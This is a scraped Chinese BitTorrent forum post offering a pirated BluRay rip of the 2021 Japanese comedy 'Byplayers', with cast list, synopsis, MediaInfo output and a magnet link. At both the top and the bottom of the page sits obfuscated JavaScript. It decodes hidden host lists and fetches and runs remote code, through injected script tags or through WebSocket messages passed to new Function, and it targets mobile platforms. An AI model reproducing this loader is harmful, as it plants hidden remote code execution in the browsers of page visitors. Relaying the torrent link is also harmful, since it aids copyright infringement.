Byplayers:如果100名配角一起拍电影[中文字幕].The.Supporting.Actors.in.Byplaywood.2021.1080p.BluRay.DTS.x265-10bit 4.97GB

版主小s 1月前 402

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 Byplayers:如果100名配角一起拍电影

◎片 名 バイプレイヤーズ~もしも100人の名脇役が映画を作ったら~

◎年 代 2021

◎产 地 日本

◎类 别 喜剧

◎语 言 日语

◎上映日期 2021-04-09(日本)

◎IMDb链接 https://www.imdb.com/title//

◎豆瓣评分 6.8/10 (922人评价)

◎豆瓣链接 https://movie.douban.com/subject/35267737/

◎片 长 100分钟

◎导 演 松居大悟 Daigo Matsui (id:1322346)

◎编 剧 藤木光彦 Mitsuhiko Fujiki (id:1432676)

宫本武史 Takeshi Miyamoto (id:1389000)

◎演 员 田口智朗 Tomorowo Taguchi (id:1037679)

松重丰 Yutaka Matsushige (id:1016968)

光石研 Ken Mitsuishi (id:1029037)

远藤宪一 Ken'ichi End? (id:1080463)

滨田岳 Gaku Hamada (id:1011107)

菜菜绪 Nanao (id:1325631)

高杉真宙 Mahiro Takasugi (id:1317846)

芳根京子 Ky?ko Yoshine (id:1348883)

胜村政信 Masanobu Katsumura (id:1314383)

渡边一计 Ikkei Watanabe (id:1043351)

安藤玉惠 Tamae And? (id:1321863)

近藤芳正 Yoshimasa Kond? (id:1105724)

津田宽治 Kanji Tsuda (id:1054163)

西村雅彦 Masahiko Nishimura (id:1039379)

本宫泰风 Yasukaze Motomiya (id:1004833)

菅田俊 Shun Sugata (id:1008079)

小泽仁志 Hitoshi Ozawa (id:1327828)

岸井雪乃 Yukino Kishii (id:1338013)

木村多江 Tae Kimura (id:1033326)

绪方义博 Denden (id:1316641)

北村一辉 Kazuki Kitamura (id:1012650)

北香那 Kana Kita (id:1367253)

有村架纯 Kasumi Arimura (id:1275528)

天海祐希 Yuki Amami (id:1059553)

役所广司 K?ji Yakusho (id:1165478)

石丸谦二郎 Kenjir? Ishimaru (id:1111349)

阿部亮平 Ry?hei Abe (id:1390667)

宇野祥平 Sh?hei Uno (id:1340184)

柄本时生 Tokio Emoto (id:1313539)

大仓孝二 Koji Ookura (id:1011644)

尾美利德 Toshinori Omi (id:1039098)

加藤谅 Ry? Kat? (id:1348584)

金子大地 Daichi Kaneko (id:1362379)

佐佐木希 Nozomi Sasaki (id:1005472)

宍户美和公 Miwako Shishido (id:1343657)

志田未来 Mirai Shida (id:1045964)

杉野遥亮 Yosuke Sugino (id:1366387)

醍醐虎汰朗 Kotaro Daigo (id:1406675)

泷藤贤一 Kenichi Takito (id:1323403)

田中要次 Y?ji Tanaka (id:1025561)

寺岛忍 Shinobu Terajima (id:1014742)

长谷川京子 Kyoko Hasegawa (id:1009875)

林泰文 Yasufumi Hayashi (id:1038997)

原田龙二 Ryuuji Harada (id:1044796)

布施绘里 Eri Fuse (id:1051850)

堀内敬子 Keiko Horiuchi (id:1021383)

观月亚理莎 Arisa Mizuki (id:1038207)

向井理 Osamu Mukai (id:1274400)

村田雄浩 Takehiro Murata (id:1033713)

森下能幸 Yoshiyuki Morishita (id:1038001)

凉 Ry? (id:1140849)

六角精儿 Seiji Rokkaku (id:1312854)

池谷伸枝 Nobue Iketani (id:1323966)

宇梶刚士 Takashi Ukaji (id:1024153)

小木茂光 Shigemitsu Ogi (id:1038695)

高畑淳子 Atsuko Takahata (id:1031429)

富田望生 Miu Tomita (id:1349120)

波冈一喜 Kazuki Namioka (id:1275851)

滨野谦太 Kenta Hamano (id:1316095)

本田博太郎 Hirotar? Honda (id:1096871)

本田望结 Miyu Honda (id:1316141)

升毅 Takeshi Masu (id:1038067)

吉田羊 Y? Yoshida (id:1316808)

利重刚 G? Rij? (id:1023947)

◎标 签 日本 / 2021 / 日本电影 / 电影 / 松重丰 / 日剧 / 光石研 / 远藤宪一

◎简 介

数星星了!由知名配角演员亲自演自己并互动的人气日剧《Byplayers》系列将推出第3季《Byplayers:名配角的森林100日》及电影版《Byplayers:如果100名配角一起拍电影》。

不仅前作主演田口智朗、松重丰、光石研、远藤宪一将回归,还有佐佐木希、志田未来、滨田岳、阿部亮平、柄本时生、高杉真宙等海量明星新加盟,规模浩大!松居大悟也将继续担任导演。

续作故事舞台设定在远离都市、被森林包围的摄影地“Byplaywood”(neta好莱坞),各电视台在这儿争相拍摄电视剧和电影,于是一场大骚动即将来临。新剧将于2021年1月开播,电影版定于2021年春季上映。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 292184674703974805182372760255175213703 (0xDBD0B8AFA8B1026C7D92B9F058524287)

  4. Complete name : The.Support[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.97 GiB

  8. Duration : 1 h 40 min

  9. Overall bit rate : 7 101 kb/s

  10. Movie name : The Supporting Actors in Byplaywood 2021 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-16 03:18:50

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 40 min

  21. Bit rate : 5 555 kb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.150

  31. Stream size : 3.89 GiB (78%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 40 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.06 GiB (21%)

  51. Title : Japanese

  52. Language : Japanese

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 35 min

  62. Bit rate : 36.8 kb/s

  63. Count of elements : 2500

  64. Stream size : 25.0 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 35 min

  76. Bit rate : 39.3 kb/s

  77. Count of elements : 2500

  78. Stream size : 26.7 MiB (1%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:09:02.876 : en:Chapter 02

  86. 00:20:52.418 : en:Chapter 03

  87. 00:27:57.342 : en:Chapter 04

  88. 00:36:54.337 : en:Chapter 05

  89. 00:44:57.570 : en:Chapter 06

  90. 00:53:41.260 : en:Chapter 07

  91. 01:03:18.795 : en:Chapter 08

  92. 01:10:45.783 : en:Chapter 09

  93. 01:18:25.159 : en:Chapter 10

  94. 01:27:29.244 : en:Chapter 11

  95. 01:36:04.634 : en:Chapter 12




复制代码


TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:4258EC7B50111950745A8E9EA78D40428FCB5B13

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};